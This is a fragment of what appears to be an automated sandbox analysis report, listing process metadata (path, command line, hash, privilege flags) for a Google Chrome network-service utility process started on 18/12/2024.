                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:17
                                                                                                        Start time:13:52:52
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1992,i,12933209959549165544,4641154033968783078,262144 /prefetch:8
                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        No disassembly